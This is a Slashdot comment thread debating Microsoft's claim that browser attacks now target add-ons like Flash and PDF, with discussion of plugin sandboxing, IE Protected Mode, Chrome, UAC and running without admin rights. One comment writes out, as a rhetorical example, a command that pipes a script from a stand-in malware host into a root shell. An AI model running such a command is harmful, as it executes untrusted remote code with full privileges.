Microsoft Blames Add-Ons For Browser Woes

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"

Duh

[Drinking+Bleach]

Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

!news

I'll still blame you for everything else.

[retech]

Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've miss some.

Re:I'll still blame you for everything else.

[stewbacca]

You forgot the "embedded video frequently doesn't play even though it's a Microsoft codec" bit.

Re:I'll still blame you for everything else.

[gmack]

That would be an add-on problem.

Re:I'll still blame you for everything else.

[xonar]

A microsoft addon, divx anyone?

Re:I'll still blame you for everything else.

[Kamokazi]

To be fair to Microsoft (And a disclaimer, I primarily use Opera myself):

-I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot.

-IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out.

-Sluggish...compared to FF3 and Opera. But it was faster than FF2 for several different langages...so then FF2 was also sluggish, by your standards.

-Bloated? How? I really don't see any bloat compared to other browsers.

-What features do you expect from it out of the box? Seems to do about the same as the others, plus or minus some minor stuff.

(Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

Re:I'll still blame you for everything else.

[Anders]

(Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

Much more needed is "-1, Reverse psychology"

(runner-up is "+1, your uid is prime")

Re:I'll still blame you for everything else.

[nine-times]

IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out.

Complaining that Firefox didn't pass Acid2 until v3 doesn't make a lot of sense if you understand why the test was made. No browsers adhere to all standards 100%, but all the browsers except IE do a fairly decent job of rendering pages the way they're supposed to. So when Acid2 was created, the idea (AFAIK) was to put together a complex rendering that would expose a selection of bugs that would cause every major browser to fail it. It was supposed to be a sort of test that said, "even if your browser is doing a pretty good job, here are some places where it might fall apart."

So it's not supposed to be the end-all be-all test of standards compliance. You can pass the Acid2 test but still not render normal pages properly, or you could generally do a good job rendering pages but fail the test. The fact that it took Firefox some time to pass isn't an indication that it took them a long time to figure it out, but rather that they fixed in in their new rendering engine and took a while to put that rendering engine into their release version of the browser. There wasn't much reason to rush because it wasn't terribly urgent.

But the question is still whether the browser will generally render pages according to the HTML and CSS standards. Most browsers do far better than IE. As for "standard-compliant mode", I still wonder how standard-compliant it will be. Right now, if I make a page, I generally have to design it to the standards, which will make it run in most browsers, and then figure out how to make it display properly in IE. If IE8 makes it so I don't have to do that anymore, a lot of my complaints will go away.

Re:I'll still blame you for everything else.

[BenoitRen]

definately

Definitely. Definitely!

IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3.

The Acid tests are not an indicator of standards compliance. They're tests of flaws in web browsers that web developers want fixed. KHTML may have passed Acid2 first, but it had a lot of rendering flaws. When Gecko didn't pass Acid2, it had less flaws and was more standards compliant overall.

Bloated? How? I really don't see any bloat compared to other browsers.

Have you checked the size of the installer files? Way larger than that of any other web browser.

Re:I'll still blame you for everything else.

[TrebleMaker]

definately

Definitely. Definitely!

People are going to write they way the write
irregardless of your protests.
You should of just, like, totally ignored him.

Permissions

[gurps_npc]

And if the Add on's were given far more permission than they actually need? If the browser works right, then the damage a poorly written add on can do should be minimal.

Re:Permissions

[TheRaven64]

Ideally, most of these plugins should be setuid as nobody, run in a separate process and have their windows reparented into the browser window. I don't know of any *NIX systems that actually do this for plugins. I believe Chrome does something similar on Windows, but IE does not (although it runs the entire browser as a less-privileged process on Vista).

Re:Permissions

[geirnord]

I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

Re:Permissions

[soniCron88]

Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

Was there a time when plug-ins couldn't have access to the harddrive?

Re:Permissions

Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself.

Re:Permissions

[ya+really]

IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?

Re:Permissions

[ShawnCplus]

That's gotta be new. Every time I've gotten within 100 yards of a site with flash Konquerer crashed.

Re:Permissions

[gurps_npc]

Because they made it easy to write shoddy code. If you make people go through hoops to get the good stuff, then they get lazy and accept the minimum. To use a real world analogy, no, you don't need to have the same key start the car as open your front door, your mail box, and your office. If you insist on selling a car, house lock, mailbox and the office, then don't also make them use the same key for 'convience'.

Re:Permissions

[catchblue22]

IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?

Should it even be possible for add-ons to do this? Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since vista bugs users for permission so much, most users would just click through the warning thoughtlessly.

I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious.

Re:Permissions

[Vancorps]

What everyday task does Vista bug you about authorizing?

I've heard this a number of times how it nags people and that the initial release was rough but since SP1 I only see allow or deny when its something I'm doing intentionally that administrative related like installing an update to a program.

I'm genuinely interested in this since I manage a lot of Windows machines and sooner or later I'll have to deal with common complaints or face turning UAC off.

Re:Permissions

[MadnessASAP]

Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use windows outside of very carefully controlled office and school enviroments without Administrator access is impossible.

Re:Permissions

[legirons]

IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.

Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)

Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)

Re:Permissions

[Lucky75]

Renaming a file (extension) under program files, for example, prompts you 3x if your sure. I think we could do without the multitude of prompts.

Are you sure?
Are you really sure?
Positive?
Ok

Re:Permissions

[CodeBuster]

can they really be blamed for shoddy coding done by third parties?

Yes they can and here is why:

If a program is going to allow addons then the communications between the addons and the main application should be conducted entirely through interfaces in order to preserve abstraction and enforce Design by Contract principles. In this way addons are allowed to plug into the application at precise locations controlled by the main application and to interact with the main application abstractly and in precisely defined and limited ways. Some people might argue that this is too limiting, but it has been my experience in developing software in this style that well designed interface contracts can support a wealth of valuable features while maintaining plug-ability and abstraction throughout the software stack. So I don't buy "It's the addons fault" since the addons, ultimately, can only do things which the main application framework has allowed them to do whether intentionally, through good abstraction, or unintentionally from poor addon framework design.

Re:Permissions

[Beryllium+Sphere(tm)]

>IE7 is set to run in sandbox mode by default.

I believe this is only on Vista.

Re:Permissions

[DarkOx]

right because your typical business users would never say want to change the extention of some think like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like the never happens....

Re:Permissions

[BradleyUffner]

right because your typical business users would never say want to change the extention of some think like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like the never happens....

I typical business user isn't ging to be storing "report.txt" in a protected system path. They are going to save it in My Documents or a subfolder, the default location presented by Vista.

Re:Permissions

[petermgreen]

Why do Mac users and Linux users manage to avoid most of this shit?
I think there are two reasons

1: there is simply less shit availible for thier platform
2: mac and linux users tend to be more experianced and discerning. Nearly all newbies use windows

Re:Permissions

[SanityInAnarchy]

Just in case anyone was going to interpret this literally:

Ideally, most of these plugins should be setuid as nobody

No, no, a thousand times no!

I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.

These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.

The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.

In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.

But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!

I've always said this.

[bigstrat2003]

The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

Re:I've always said this.

And if your browser isn't full of security holes, it doesn't matter which sites you go to.

I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses.

Re:I've always said this.

[SQLGuru]

How about a car analogy?

If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware.

Layne

Re:I've always said this.

[Sloppy]

The biggest part of internet security is paying attention to where you go.

I would agree with you, if "going" to a malware site meant

curl ftp://malwaresite.com/malware.sh | sudo bash

Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

"Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

Re:I've always said this.

[joeflies]

I think your theory works for preventing the majority of issues, but it doesn't solve the problem. Just because you're careful, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent somone from taking over your machine.

You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting mugged. But that doesn't make you mugging-proof.

Re:I've always said this.

[bigstrat2003]

This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy.

Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners.

Of course you should use condoms, that's just prudence. But the first line of defense is knowing who you're having sex with.

And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training.

Re:I've always said this.

[uniquename72]

In fairness to gp, looking at someone through a telescope isn't entirely risk-less, either. They could, for example, shine a laser back at you and destroy your retina. Or pull a goatse, resulting in same.

But remember

[dedazo]

If it's Firefox, it's perfectly OK to blame the add-ons.

Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

Re:But remember

[xant]

I think the point has always been that it was easier to fix those leaks in the add-ons than to implement draconian quotas on add-ons in the browser.

They were able to fix it to some degree, but all it's doing is preventing poorly-written addons from leaking memory. I think protecting the user from his addons is a superior technical solution, but it isn't Firefox's "fault" that the addons were written poorly.

And I would in fact apply the same argument to IE and extend it to Windows: plugins to IE causing problems? Disable the plugins, not IE. Drivers making windows bluescreen? Blame the drivers, not Windows.

But still try to sandbox things a little better so buggy extension code doesn't kill the experience.

Bullshit. Plain utter bullshit.

[syousef]

Many non-power-users don't use addons at all.

If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

Re:Bullshit. Plain utter bullshit.

[EvanED]

Many non-power-users don't use addons at all.

And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

Re:Bullshit. Plain utter bullshit.

[athakur999]

Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.

If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.

Re:Bullshit. Plain utter bullshit.

[TheRaven64]

Can anyone point to an add-on that has more users than ANY brand of browser?

Sun Java? Adobe Flash? Not sure about the former does, but the latter has a much bigger installed-base than IE.

Re:Bullshit. Plain utter bullshit.

[Jamie's+Nightmare]

Many non-power-users don't use addons at all.

That's incorrect. Most of them install the add-ons without really knowing that they are doing, or don't unchecked the box that says "Install this tool bar you don't want" when installing software.

Re:Bullshit. Plain utter bullshit.

[nschubach]

Yes, I'm still trying to figure out how to teach my Mom that she doesn't need EVERY toolbar in existence.

Re:Bullshit. Plain utter bullshit.

[clodney]

I think the article was not referring to addons in the sense that a geek thinks of them - adblock, firebug, noscript, etc.

Instead, they mean the biggies - acrobat, flash, quicktime. Most systems will have some or all of those installed.

Re:Bullshit. Plain utter bullshit.

[Fujisawa+Sensei]

Many non-power-users don't use addons at all.

If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

Many power-users install only a minimal number of addons to do what we want. Stuff like flash-block along with flash. We don't need a dozen fool-bars or huge numbers of widgets.

Re:Bullshit. Plain utter bullshit.

[vux984]

And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

To be fair, those often get loaded by accident - as part of installing adobe reader, or java, or skype, or whatever, and of course its defaulted to install, so unless you read every page of the installation wizard, they get you.

Re:Bullshit. Plain utter bullshit.

[Zerimar]

No matter how many times I remove Google and Yahoo toolbars from my Dad's PC, it always gets reinstalled. Too many freeware apps come with it "pre-checked" during installation, and too many users just click "Yes" or "OK" on every prompt.

Tied down!

It's browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow!

I think they have a point..

With the likes of ActiveX, and Silverlight out there, who could blame IE?

Re:I think they have a point..

[Ethanol-fueled]

Finally!

28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.

Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

Re:I think they have a point..

[bigstrat2003]

Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever.

Re:I think they have a point..

[greg_barton]

Users are always the biggest security threat. It's the OS's job to protect them. OSX and Linux seem to haev no problem doing this, so why can't Windows?

Speaking of add-ons

Would an example of this include the Active X Control you have to install to be able to run Windows Update?

Plugin model

[Enderandrew]

Aren't the responsible for the plugin model in their browser? Aren't they responsible for the OS security?

Take a look at how Chrome handles plugins and then try to pass the buck.

Re:Plugin model

[benjymouse]

Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity. IE protected mode is run in "low integrity" - where Vista on intrinsic level protects against modifications to the file system, registry, network access etc.

Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities.

If a plugin needs more advanced access than what is provided by his broker process then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability)which enabled a security researcher to execute a program on the Vista in the pwn2own contest.

Presumably Adobe will use the same approach on other browsers with a similar model such as Chrome. That is why the security researcher was adament that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OS'es which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rouge process taking over the machine, but it does provide more robustness and protect the individual tabs against other tabs going rogue because of browser bugs.

Re:Plugin model

Yes, they are responsible for the plug-in architecture. However, the architecture only provides the mechanism through which the plug-ins are loaded and communicate with the browser, they don't provide any further facility. The plug-ins are simply binaries which are loaded into the process space of the browser. The browser process dictates the security context under which the plug-in will execute. In all browsers on all platforms if the plug-in has a vulnerability exploiting that vulnerability gains the attacker the same privileges as exploiting the browser itself, which is generally the privileges of the current user.

The best route is to run the entire browser within a constrained security context. Internet Explorer 7.0 running on Vista with Protected Mode enabled, which is the default, runs under such a constrained context. It may be possible to exploit the browser or a plug-in but that exploit will be severely limited. For example, not long after Vista was released a vulnerability was identified in the library responsible for loading animated cursor files. The vulnerability could be successfully exploited on Windows XP and Windows Vista, but if protected mode was enabled the exploit was unable to deliver it's payload on Vista.

What Chrome attempts to do is to load the plug-ins into child processes of the browser. This is done for reliability purposes, not security. Unlike the renderer child processes, the plug-in child processes are not constrained using the Windows job API. A vulnerable plug-in would be just as exploitable. The reason Google did not lock down the plug-in child process is because the plug-ins do not expect to be hosted outside of the browser process. This by itself has caused a lot of problems and the Chrome code has hard-coded a number of behaviors specific to certain plug-ins simply to ensure that they work. Flash, for example, is still rendered within a window handle owned by the browser process. Chrome has taken a novel approach, but it is not sustainable.

In my opinion there needs to be a collaborative effort in order to design a new plug-in architecture and framework under which it is assumed that the plug-in will be loaded outside of the browser process as well as executed within an extremely tight sandbox. All interaction between the plug-in will be carried out by a specific API and any action the plug-in attempts to make outside of the sandbox must be negotiated through a broker API. This would effectively combine the approaches taken by Google and Microsoft. However, I don't think that either company has the ability to pull off such a change alone, which is why I call for a collaborative effort which would include at least Microsoft, Apple, Google and the Mozilla Foundation, perhaps under the supervision of a standards body such as ECMA.

Largely yes and largely ignorance (mitigation)

[betelgeuse68]

Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude with IE's woes miss or fail to understand (yeah including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as as "root"!!! ("administrator" in the Windows vernacular)

I wrote a utility called RemoveAdmin available on Download.com that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights:

http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=mncol&cdlPid=10835515

The installer will create shortcuts for IE and Fifrefox but if you look carefully it's really a program with the browser .EXE passed as an argument.

Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this.

This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights.

(Some caveats)

This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials).

If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link. Likewise this is what you would do before going to WindowsUpate.

And finally, to convince yourself the utility does something useful. Go to any site, "View Source" after you run your browser with the secure link and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't.... since your browser process doesn't have administrative rights (root) and thus any process it launches doesn't either (think of this as a plug-in scenario).

Maybe I'll educate some % of the IT world yet...

Respectfully,
-M

Re:Largely yes and largely ignorance (mitigation)

[betelgeuse68]

But tell me FreakinSyco... how many people, think Joe and Jane Sixpack run with non-administrative accounts at home under Windows XP?

Even worse, 99% of IT people will do the same, i.e. rely on anti-virus vs. the principle of least privilege which they'll call out in a heartbeat on *NIX ("Don't run as root!!!") but fail to do the same when at home under Windows XP. It's largely a user education issue. Few people know about the tools Windows does offer and assume it's completely insecure (that's not true).

Further lots of Windows software has assumed the user DOES have administrative privileges. At one point in time Google Desktop would simply not run in a non-admin desktop. Other software dating back to Windows 9x was also guilty of this. Until a couple of years ago Winamp failed to run if you were not an administrator. Why? Because it stored its configuration (Winamp.ini) in C:\Windows and it maintained global settings for the entire machine via the depracted GetPrivateProfileString and WritePrivateProfileSring APIs dating back to Windows 3.x.

Do you think your average user would likely have such information? Or even care? They just want software to work!

This tool is a compromise. 1) People don't like passwords. 2) Most Windows XP users run as administrators with nary an understanding of the dangers getting them to change to a non-admin account has many, MANY barriers 3) This tool is a compromise.

If you run as "god"/root/administrator then by proxy as your browser pulls in crap off the Net, guess what's going to happen? Yes, security issues will persist, such as cross site scripting, but which would you rather have, a browser flaw that at most might steal some file on your system or getting your machine instrumented with a root kit? No system is 100% secure but the key is to minimize exposure.

RemoveAdmin leverages a security API that's actually part of Windows Vista as well. If you have an end user that has foolishly turned off UAC. This tool will work there. It will also work with Windows 2000.

-M

This is too fun

I like the sex analogies; I think this should be a new standard for /.

Yours has some good points but:

Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task.

Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way?

Re:This is too fun

[Bargeld]

>>I like the sex analogies; I think this should be a new standard for /.

Nonstarter. Reader-base is unfamiliar with the interface.

Back to car analogies please.

--Bargeld

What about kde-gnash?

[mangu]

There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was.

You are right that konqueror does not crash the whole computer, but that's still very far from the desired result.

ABM

[YetAnotherBob]

This is marking. Blame ABM, Anybody But Microsoft.

Truth is that IE is not the best browser, but is better than it was.

Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too.

Why is any of this news? It is really just a marketing departments attemt to deflect blame away from where it belongs.

First Hand Refutation

[Cormophyte]

I installed Windows Vista on my Mac Pro in order to run the one program I wanted that I couldn't get for Mac OS the other day (Fallout 3) and while waiting for the install to finish I viewed a few web pages. I'm not talking about pornindex2000.ru here, however it wasn't cnet, either. On a scale of amish to thai hooker I was in solid girl in high school who smoked out back territory.

In any case, I didn't really care what sort of virus or malware or autodialer or rootkit or killprog or hypnotoad I picked up because it would steal my Fallout saved games and then be deleted along with the ntfs partition when I was done playing. However, out of curiosity I installed virus protection some days later and lo and behold within about four or five domains on a fully updated Vista and completely unmodified IE7 I had picked up something. Either a production install of Fallout gave me something, or it was IE. Sooo, no, MS. Go directly to jail, do not collect my license fee.

He's right you know ...

[Luscious868]

'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said.

And if you believe that I've got this great piece of land I'd like to sell you.

It's still your damn fault

[BlueParrot]

Now lets see... why is it that we need addons for something a simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end.

ActiveXploit

[VGPowerlord]

Wait, did Microsoft just admit that ActiveX is one of the largest security holes ever?

Listen to his comments for the full story

[Jeff+Moss]

Quick note: This article is a spin off of what Eric had to say during the most recent Black Hat Webcast, where Jeremiah Grossman was talking about clickjacking and other related browser issues. Eric made a lot of sense talking about plug ins and addons being the cross platform low hanging fruit.

Listen and watch the webinar to hear what he had to say and keep everything in context:
http://w.on24.com/r.htm?e=122494&s=1&k=05ED21C1734D531D2D84CA56F4ADB0F2

Or download the .m4b audio file when we get it online next week here:
https://www.blackhat.com/html/webinars/webinars-index.html